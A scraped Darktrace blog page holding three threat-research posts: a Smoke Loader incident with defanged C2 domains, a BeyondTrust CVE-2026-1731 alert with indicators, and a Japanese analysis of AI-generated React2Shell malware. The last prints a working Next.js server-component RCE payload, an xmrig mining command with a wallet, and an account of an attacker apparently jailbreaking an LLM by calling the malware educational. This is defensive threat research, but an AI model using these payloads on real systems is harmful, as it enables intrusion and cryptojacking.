ブログ
/
/
July 30, 2017

Detecting Metamorphic Malware with Darktrace's AI Technology

Detect metamorphic malware with Darktrace's AI. Learn how it uncovers self-modifying cyber-attacks and stops threats that evade traditional security measures.
Written by
Justin Fier
SVP, Red Team Operations
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Fier
SVP, Red Team Operations
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
30
Jul 2017

Some of the most insidious threats that Darktrace finds use self-modifying technology to hide their presence on the network. These attacks can dynamically change their threat signatures, automatically extract data, and spread without a human controller.

Recently, we discovered anomalous activity on the network of a major US university. After investigation, we found that the anomaly was the ‘Smoke Malware Loader’ which employs numerous techniques to evade internal security. Most notably, the malware generates fake traffic to hide its presence.

Darktrace observed the initial infection when three anomalous executables were transferred over plain text. The malware did not match any known threat signatures, allowing it to bypass the network’s perimeter controls.

C1ulyq1wLrMBs6LG00 on Thu Sep 8, 13:19:01
Co2eAJ2GifEkWut700 on Thu Sep 8, 12:09:52
CdcZeu200UOsuf5u00 on Wed Sep 14, 16:38:44

The connections originated from a suspicious external domain that the company had never communicated with before:

lago666[.]com (91.243.193.149)

Both the anomalous download and the beaconing activity represented major deviations from the unique ‘pattern of life’ learned by the Enterprise Immune System.

Although the payload circumvented the network’s perimeter security, the company also had an alternate security system monitoring network flow. This tool raised an alert when the download occurred, but it was deemed a ‘false positive’ because the malware proceeded to install new, previously unknown versions of the executable to the Windows registry.

After the self-modifying modules were uploaded to the company device, a large number of HTTP POST requests were sent against /smk/log.php to the following domains:

lago666[.]com
lago666[.]xyz
lago666[.]pw
lago666[.]top
lago666[.]site
lago666[.]bid
www.lago666[.]website
lago666[.]online
www.lago666[.]space
lago666[.]website
lago666[.]space
www.lago666[.]online
lago666[.]trade
lago666[.]webcam
lago666[.]tech
lago666[.]host
lago666[.]press

The malware attempted to transfer data to these external destinations, but to hide its tracks, the remote machine replied with a fake 404 error code. These connections were deemed highly anomalous by Darktrace’s AI algorithms.

Since the payload was designed to be compatible with the password grabber module2 – which is often deployed side-by-side with Smoke Malware Loader – the data attempting to leave the network likely contained user credentials and passwords.

In conjunction with the initial transfer, another anomalous file was then delivered to a different device. This activity indicated that the threat actor was likely attempting to move laterally across the network:

hxxp://cdn.che[.]moe/izgmcx.exe (connection UID: CGH6uV3G5tdKSNY800) to 10.1.105.117 on Mon Sep 12 at 08:02:03.

Darktrace detected each anomaly in real time as the situation developed. By using AI algorithms to continuously learn normal behavior, Darktrace was able to monitor the malware’s changing threat signature.

Traditional security tools – no matter how advanced – are incapable of detecting such sophisticated threats. Legacy controls rely on rules and signatures, and these threats are specifically designed to bypass rules and signatures.

Darktrace’s real-time threat detection allowed the university’s security team to quarantine the infected devices before the malware could burrow deeper into the network, and before the attacker could use the passwords to further compromise the network. Darktrace then assisted the security team as they remediated the situation and changed their security protocols and passwords.

執筆者
Justin Fier
SVP, Red Team Operations
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Fier
SVP, Red Team Operations

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

February 13, 2026
Emma Foulger
Global Threat Research Operations Lead
Watch the NIS2 Webinar
よく読まれているブログ
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
さらに読む
No items found.

Blog

/

/

February 13, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

Default blog imageDefault blog image

Note: Darktrace's Threat Research team is publishing now to help defenders. We will update continue updating this blog as our investigations unfold.

Background

On February 6, 2026, the Identity & Access Management solution BeyondTrust announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution using specially crafted requests.  This vulnerability affects BeyondTrust Remote Support (RS) and particular older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against Beyond Trust technology have been cited as being affiliated with nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. This incident led to subsequent emergency directives from  the Cybersecurity and Infrastructure Security Agency (CISA) and later showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with React2Shell mass exploitation previously observed by Darktrace, with command-and-control (C2) domain  avg.domaininfo[.]top seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

-              Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing; these services are commonly abused by threat actors for exploit validation.  Associated Darktrace models include:

o    Compromise / Possible Tunnelling to Bin Services

-              Suspicious executable file downloads. Associated Darktrace models include:

o    Anomalous File / EXE from Rare External Location

-              Outbound beaconing to rare domains. Associated Darktrace models include:

o   Compromise / Agent Beacon (Medium Period)

o   Compromise / Agent Beacon (Long Period)

o   Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

o   Compromise / Beacon to Young Endpoint

o   Anomalous Server Activity / Rare External from Server

o   Compromise / SSL Beaconing to Rare Destination

-              Unusual cryptocurrency mining activity. Associated Darktrace models include:

o   Compromise / Monero Mining

o   Compromise / High Priority Crypto Currency Mining

And model alerts for:

o    Compromise / Rare Domain Pointing to Internal IP

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior:

·      217.76.57[.]78 – IP address - Likely C2 server

·      hXXp://217.76.57[.]78:8009/index.js - URL -  Likely payload

·      b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7  - SHA1 - Likely payload

·      195.154.119[.]194 – IP address – Likely C2 server

·      hXXp://195.154.119[.]194/index.js - URL – Likely payload

·      avg.domaininfo[.]top – Hostname – Likely C2 server

·      104.234.174[.]5 – IP address - Possible C2 server

·      35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload

·      hXXp://134.122.13[.]34:8979/c - URL – Possible payload

·      134.122.13[.]34 – IP address – Possible C2 server

·      28df16894a6732919c650cc5a3de94e434a81d80 - SHA1 - Possible payload

References:

1.        https://nvd.nist.gov/vuln/detail/CVE-2026-1731

2.        https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/

3.        https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

Network

/

February 12, 2026

AI/LLMで生成されたマルウェアを使ったReact2Shellエクスプロイト

Default blog imageDefault blog image

はじめに

敵対者の行動をリアルタイムに観測するため、ダークトレースは“CloudyPots” と呼ばれるグローバルなハニーポットネットワークを運用しています。CloudyPotsは幅広いサービス、プロトコル、クラウドプラットフォームに渡って悪意あるアクティビティを捕捉するように設計されています。こうしたハニーポットはインターネットに接続されているインフラを狙う脅威のテクニック、ツール、マルウェアについて貴重な情報を提供してくれます。

最近観測されたダークトレースのCloudypots環境に対する侵入インシデントは、React2Shell 脆弱性をエクスプロイトする完全にAI生成のマルウェアを明らかにしました、AI 支援ソフトウェア開発(“vibecoding”とも呼ばれます)が広く普及するにつれ、攻撃者はますます大規模言語モデルを使って迅速にツールを開発するようになっています。このインシデントは状況の大きな変化を表しています。AIによって、今では低スキルのオペレーターであっても効果的なエクスプロイトのフレームワークを短期間に作りだすことが可能となっているのです。このブログでは、攻撃チェーンを精査し、AI生成ペイロードを分析し、この変化が防御者にとって何を意味するかを解説します。

初期アクセス

ダークトレースのdockerハニーポットに対して侵入が観測されました。これは意図的にDockerデーモンを認証なしでインターネットに露出させています。この設定により任意の攻撃者がデーモンを発見しDocker APIを通じてコンテナを作成することが可能です。 

攻撃者は“python-metrics-collector”という名前のコンテナを生成しました。これにはcurl、wget、python 3を含む必要ツールを最初にインストールするスタートアップコマンドが設定されていました。

Container spawned with the name ‘python-metrics-collector’.
図1:‘python-metrics-collector’ という名前で生成されたコンテナ

次に、必要な一連のpythonパッケージを次からダウンロードします

  • hxxps://pastebin[.]com/raw/Cce6tjHM,

最後に次からpythonスクリプトをダウンロードして実行します

  • hxxps://smplu[.]link/dockerzero.

このリンクは“hackedyoulol”がホストするGitHub Gistにリダイレクトされますが、このアカウントは本ブログ執筆時点でGitHubから利用停止措置を受けています。

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

注目すべき点は、dockerを狙ったマルウェアであるにもかかわらずこのスクリプトにdockerスプレッダーが含まれていなかったことです。これは、感染の拡大が別に中央管理されたスプレッダーサーバーで処理されている可能性が高いことを示しています。

展開されたコンポーネントと実行チェーン

ダウンロードされたPythonペイロードは侵入のための中心的な実行コンポーネントでした。マルウェア自体が難読化設計となっており、エクスプロイトスクリプトと拡散メカニズムの間でこの難読化が強化されていました。dockerマルウェアには通常、自身のスプレッダーロジックが含まれているため、これが欠けているということは攻撃者が拡散専用のツールをリモートで管理し、実行していることを示唆しています。

スクリプトは複数行のコメントで始まっています:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

これは非常に多くのことを語っています。当社が分析したサンプルのほとんどではファイル内にこのレベルのコメントは含まれていません。多くの場合それらは分析を阻害するために意図的に理解しにくく設計されています。人間のオペレーターが短時間に記述したスクリプトはたいていの場合わかりやすさよりもスピードと機能を優先しています。一方、LLMはすべてのコードに対して詳しくコメントを記録するよう設計されており、このサンプルにも繰り返しこのパターンが表れています。 さらに、AIはそのセーフガードの一環としてマルウェアの生成を拒否します。

さらに、“Educational/ResearchPurpose Only(教育/研究目的専用)” というフレーズが含まれていることは、攻撃者が悪意ある要求を教育目的と偽ることによって、AIモデルのジェイルブレイクを行ったことを示唆しています。

さらにスクリプトの一部をAI 検知ソフトウェアでテストしたところ、その出力結果はコードがおそらくLLMによって生成されているということを示していました。

GPTZero AI-detection results indicating that the script was likely generated using an AI model.
図2:GPTZeroによるAI検知の結果は、スクリプトがAIモデルを使って生成された可能性を示しています。

スクリプトはよくできたReact2Shellエクスプロイトツールキットであり、リモートコード実行を行いXMRig (Monero) 暗号通貨マイニングマルウェアを展開しようとするものです。 IP生成ループを使って標的を見つけだし、以下を含むエクスプロイトリクエストを実行します:

  • 念入りに構成されたNext.jsサーバーコンポーネントペイロード
  • 実行を強制しコマンド出力を明らかにするよう設計されたチャンク
  • 任意のシェルコマンドを実行する子プロセス起動

  def execute_rce_command(base_url, command, timeout=120):  
   """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
   DO NOT MODIFY THIS FUNCTION
   Returns: (success, output)  
   """  
try: # Disable SSL warnings     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 crafted_chunk = {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": '{"then": "$B0"}',
      "_response": {
          "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
          "_formData": {
              "get": "$1:constructor:constructor",
          },
      },
  }

  files = {
      "0": (None, json.dumps(crafted_chunk)),
      "1": (None, '"$@0"'),
  }

  headers = {"Next-Action": "x"}

  res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

この関数は最初 ‘whoami’を使って起動され、ホストが脆弱かどうかを判断し、次にwgetを使ってGitHubレポジトリからXMRigをダウンロードし、設定されたマイニングツールとウォレットアドレスを指定してこれを起動します。

]\

WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

多くの攻撃者が気づいていないことは、Moneroでは不透明なブロックチェーン(トランザクションを追跡できずウォレット残高が閲覧できない)が使われているものの、supportxmr等のマイニングプールは各ウォレットのアドレスに対する統計情報を公開していることです。これによりキャンペーンの成功と攻撃者の利益を追跡することは簡単に行えます。

The supportxmr mining pool overview for the attackers wallet address
図3:supportxmrマイニングツールに表示される攻撃者のウォレットアドレス概要

この情報に基づき、この攻撃者はキャンペーン開始以来0.015 XMRを得ましたがこれは本ブログ執筆時点で5ポンド程度です。1日あたり、攻撃者は0.004 XMRを生成しており、これは1.33ポンドの価値です。ワーカー数は91であり、91のホストがこのサンプルに感染していることを意味しています。

まとめ

攻撃者が生成した金額はこのケースでは比較的少額であり、暗号通貨マイニングは新しいテクニックとは言えませんが、このキャンペーンはAIベースのLLMがサイバー犯罪を容易にした実例です。モデルとの1度のプロンプトセッションで、この攻撃者は機能するエクスプロイトフレームワークを生成し、90以上のホストを侵害することができています。これはAIベースのLLMによってサイバー犯罪がこれまで以上に簡単になったことを実証しており、攻撃者にとってのAIのオペレーション上の価値は過小評価されるべきではないことを示しています。

CISOおよびSOCのリーダーは、このインシデントを近い将来起こり得ることとして想定すべきです。脅威アクターは、今やオンデマンドでカスタムマルウェアを生成し、エクスプロイトを即座に改変し、侵害のすべての段階を自動化することができます。防御者は、迅速なパッチ適用、継続的なアタックサーフェスの監視、およびビヘイビアベースの検知アプローチを優先的に進める必要があります。AI 生成されたマルウェアはもはや理論上のものではなく、実際に運用されており、スケーラブルで、誰でもアクセスできるものなのです。

アナリストのコメント

ダウンロードされたスクリプトにDockerスプレッダーが含まれていないように見えることが注目に値します。これはこのマルウェアが感染したホストから他の被害者に複製されないことを意味しています。これはダークトレースの調査チームが分析した他のサンプルと比較して、Dockerマルウェアではあまりないことです。これは拡散のための別のスクリプトがあることを示しており、おそらく攻撃者が中央のスプレッダーサーバーから展開するものと思われます。この推論は接続を開始したIP、49[.]36.33.11が、インドの一般住宅用ISPに登録されていることからも成り立ちます。攻撃者が住宅用プロキシサーバーを使って形跡を隠している可能性もありますが、彼らの自宅のコンピューターから拡散用スクリプトを実行していることも考えられます。しかしこれは確認済みのアトリビューションと理解するべきではありません。

担当:Nathaniel Bill (Malware Research Engineer)、Nathaniel Jones (Nathaniel Jones, VP Threat Research | Field CISO AISecurity)

侵害インジケータ(IoC)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ